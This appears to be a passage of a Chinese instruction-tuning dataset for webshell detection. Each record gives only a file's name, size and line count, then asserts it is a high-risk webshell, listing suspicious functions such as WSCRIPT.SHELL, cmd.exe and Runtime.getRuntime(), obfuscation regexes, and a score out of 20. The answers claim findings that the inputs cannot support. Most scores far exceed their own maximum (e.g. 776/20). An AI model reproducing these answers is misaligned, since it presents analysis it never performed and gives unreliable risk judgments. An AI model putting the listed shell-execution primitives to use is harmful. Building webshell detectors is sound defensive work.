"{\"文件名\": \"cmd.asp\", \"文件类型\": \"asp\", \"文件大小\": \"1468 bytes\", \"行数\": 53}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.Form, WSCRIPT.SHELL, Response.Write, cmd.exe 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/cmd.asp", "malicious_score": 21, "md5_hash": "97af88b478422067f23b001dd06d56a9"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ELMALISEKER Backd00r.asp\", \"文件类型\": \"asp\", \"文件大小\": \"38479 bytes\", \"行数\": 1004}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject(, Request.form, request.form, Request.Form, WSCRIPT.SHELL 发现混淆技术: chr\\s*\\( 恶意度评分: 776/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/web-malware-collection-13-06-2012/ASP/ELMALISEKER Backd00r.asp", "malicious_score": 776, "md5_hash": "c7fda2d9b971f88df34085c8019df08f"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"moon.php\", \"文件类型\": \"php\", \"文件大小\": \"121668 bytes\", \"行数\": 291}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_COOKIE[, $_GET[ 具备文件操作能力: move_uploaded_file 恶意度评分: 67/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/php/moon.php", "malicious_score": 67, "md5_hash": "716803775642bf06c821d433af879eb8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"s-u.php\", \"文件类型\": \"php\", \"文件大小\": \"8998 bytes\", \"行数\": 250}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, file_get_contents(, $_COOKIE[, $_POST[, fputs ( 包含网络功能: fsockopen 具备文件操作能力: move_uploaded_file 恶意度评分: 212/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/php/s-u.php", "malicious_score": 212, "md5_hash": "e6d12f37dd61e19657528facfe23b3f5"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.php\", \"文件类型\": \"php\", \"文件大小\": \"32 bytes\", \"行数\": 1}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: assert(, $_REQUEST[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/php/2.php", "malicious_score": 6, "md5_hash": "267c37c3a285a84f541066fc5b3c1747"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zip.php\", \"文件类型\": \"php\", \"文件大小\": \"9929 bytes\", \"行数\": 342}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_REQUEST[, eval( 发现混淆技术: pack\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, mkdir\\s*\\(, fwrite\\s*\\( 恶意度评分: 103/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/php/php网站打包(dodo)/zip.php", "malicious_score": 103, "md5_hash": "53446381f7ea718ac13be71018668e3a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菊花聊天室.php\", \"文件类型\": \"php\", \"文件大小\": \"1858 bytes\", \"行数\": 41}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 8/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/ChatRoom/菊花聊天室.php", "malicious_score": 8, "md5_hash": "0be750b2f6f5c28a50d264bcf95c0e27"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菊花聊天室.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2090 bytes\", \"行数\": 51}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.form, response.write, CreateObject( 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/ChatRoom/菊花聊天室.asp", "malicious_score": 9, "md5_hash": "e7b6417bdc5b21b3177f4cc35a1b30ef"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"啊D小工具 - 目录读写检测 [ASP版].asp\", \"文件类型\": \"asp\", \"文件大小\": \"6005 bytes\", \"行数\": 186}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 101/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/可读写目录探测/啊D小工具 - 目录读写检测 [ASP版].asp", "malicious_score": 101, "md5_hash": "b0d0d8b34fba270a5eb274d84e0117d1"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"很好用的扫可读可写目录asp脚本xwdir.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2530 bytes\", \"行数\": 99}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, response.write 恶意度评分: 33/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/可读写目录探测/很好用的扫可读可写目录asp脚本xwdir.asp", "malicious_score": 33, "md5_hash": "ef476798a81b1712b5ae798fc15af21e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"从注册表中读存在路径.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/可读写目录探测/从注册表中读存在路径.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP 搜索可读可写目录脚本.php\", \"文件类型\": \"php\", \"文件大小\": \"1313 bytes\", \"行数\": 51}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[ 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/可读写目录探测/PHP 搜索可读可写目录脚本.php", "malicious_score": 6, "md5_hash": "bc170a68ff7cb4a05a334be717b50736"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Aspx(免杀).aspx\", \"文件类型\": \"asp\", \"文件大小\": \"120759 bytes\", \"行数\": 2941}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/Aspx(免杀).aspx", "malicious_score": 447, "md5_hash": "3b68b1039e419a3e0953bd3d739bf8d2"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspx.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"70380 bytes\", \"行数\": 2588}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/aspx.aspx", "malicious_score": 36, "md5_hash": "60881e9daefa09fe1fd75b5e0fb01f3e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"11.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"62590 bytes\", \"行数\": 1561}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/11.aspx", "malicious_score": 27, "md5_hash": "e5027309bf8343934d3dfd24250f91a0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"干净清爽的大马,不怎么好用.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"46343 bytes\", \"行数\": 1047}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, Execute(, response.Write, CreateObject(, createObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 63/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/干净清爽的大马,不怎么好用.aspx", "malicious_score": 63, "md5_hash": "352a8a9c10c8551855412c07eca9798c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"46343 bytes\", \"行数\": 1047}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, Execute(, response.Write, CreateObject(, createObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 63/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/1.aspx", "malicious_score": 63, "md5_hash": "352a8a9c10c8551855412c07eca9798c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1----环境检测功能非常不错.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"62590 bytes\", \"行数\": 1561}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/1----环境检测功能非常不错.aspx", "malicious_score": 27, "md5_hash": "e5027309bf8343934d3dfd24250f91a0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"view.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"59534 bytes\", \"行数\": 1685}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, Response.write, CreateObject( 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 426/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/view.aspx", "malicious_score": 426, "md5_hash": "1807b32abb9a7b604e366d7c8f2db1b2"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASP.NET Web BackDoor.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"120931 bytes\", \"行数\": 2949}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/ASP.NET Web BackDoor.aspx", "malicious_score": 447, "md5_hash": "5bb7e754c721ccf68e7d06f83358ed66"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspxspy.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61913 bytes\", \"行数\": 1563}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/aspxspy.aspx", "malicious_score": 27, "md5_hash": "ba55e0634db31bfe37d979269deefac0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"01.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"120759 bytes\", \"行数\": 2941}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cmd.Exe, wscript.shell, Request.QueryString, Response.Write, cmd.exe 恶意度评分: 447/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/01.aspx", "malicious_score": 447, "md5_hash": "3b68b1039e419a3e0953bd3d739bf8d2"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"sniffer--aspx的嗅探工具.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"20304 bytes\", \"行数\": 707}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.Form 具备文件操作能力: copy\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/sniffer--aspx的嗅探工具.aspx", "malicious_score": 10, "md5_hash": "f3c46a414567251fd5bc59e1f1ead300"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61913 bytes\", \"行数\": 1563}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/aspxspy/1.aspx", "malicious_score": 27, "md5_hash": "ba55e0634db31bfe37d979269deefac0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspxspy.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"61913 bytes\", \"行数\": 1563}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, execute(, Cmd.exe, Response.Write, cmd.exe 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 27/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/aspx/aspxspy/aspxspy.aspx", "malicious_score": 27, "md5_hash": "ba55e0634db31bfe37d979269deefac0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"56060 bytes\", \"行数\": 1780}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/ma4.jsp", "malicious_score": 175, "md5_hash": "eebc60a70e1823f2aa519a57fb8992c7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"no.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30189 bytes\", \"行数\": 995}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/no.jsp", "malicious_score": 37, "md5_hash": "08f3b1efbec31fcc861efac30aaafaff"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86575 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/JspSpyJDK5.jsp", "malicious_score": 316, "md5_hash": "341298482cf90febebb8616426080d1d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spjspshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"18473 bytes\", \"行数\": 814}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 34/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/spjspshell.jsp", "malicious_score": 34, "md5_hash": "7ab8dac087317a99e1be1234bc585ce8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"32024 bytes\", \"行数\": 807}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 112/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/ma2.jsp", "malicious_score": 112, "md5_hash": "e94e8a70845ae6fac92209fc3099beb9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JFolder.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31057 bytes\", \"行数\": 1022}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/JFolder.jsp", "malicious_score": 37, "md5_hash": "6bd8edbd1a1c262000d0958a3794fdb6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"job.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57726 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/job.jsp", "malicious_score": 175, "md5_hash": "d6a0655273ed5bf26242ea4c8afcd02a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84411 bytes\", \"行数\": 2317}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/ma3.jsp", "malicious_score": 315, "md5_hash": "7d149e78f2ab9e419dd34a135c920432"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"silic webshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"27766 bytes\", \"行数\": 844}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/silic webshell.jsp", "malicious_score": 37, "md5_hash": "d8317bf0239a65c4f8055f9e066fdae5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"53835 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/ma1.jsp", "malicious_score": 175, "md5_hash": "e1afc17af43733629dc562c8462024fa"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"in.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"28853 bytes\", \"行数\": 982}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/in.jsp", "malicious_score": 37, "md5_hash": "ffb4ddde520f78481706510db4ab55ab"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85012 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/jspbrowser/1.jsp", "malicious_score": 324, "md5_hash": "66babb369c3c9dd3a7b02e9acbf1e210"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/jspbrowser/Browser.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"55431 bytes\", \"行数\": 1778}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/jsp/jspbrowser/2.jsp", "malicious_score": 175, "md5_hash": "5b50da3be91aed89f167b27108adf5d8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mssql在线管理.asp\", \"文件类型\": \"asp\", \"文件大小\": \"46663 bytes\", \"行数\": 1300}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, request.QueryString, execute (, execute( 发现混淆技术: chr\\s*\\( 恶意度评分: 83/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/mssql在线管理.asp", "malicious_score": 83, "md5_hash": "5893219aebfb40e2331929f31976248e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"修改属性.asp\", \"文件类型\": \"asp\", \"文件大小\": \"2028 bytes\", \"行数\": 64}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: request.Form, Response.WRItE, CreateObject( 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/修改属性.asp", "malicious_score": 30, "md5_hash": "8b97ed3d0b11700f5fc519603b4c38b2"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/asp目录可写扫描/1.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wt.asp\", \"文件类型\": \"asp\", \"文件大小\": \"5392 bytes\", \"行数\": 173}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 98/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/asp目录可写扫描/wt.asp", "malicious_score": 98, "md5_hash": "7b77932607051314859e46612f5b32bc"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"finaly.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5009 bytes\", \"行数\": 108}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/net-friend/asp/asp目录可写扫描/finaly.aspx", "malicious_score": 6, "md5_hash": "f4b6773c752b5d53c4898cab21a4fdc8"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wt.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"6730 bytes\", \"行数\": 146}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write 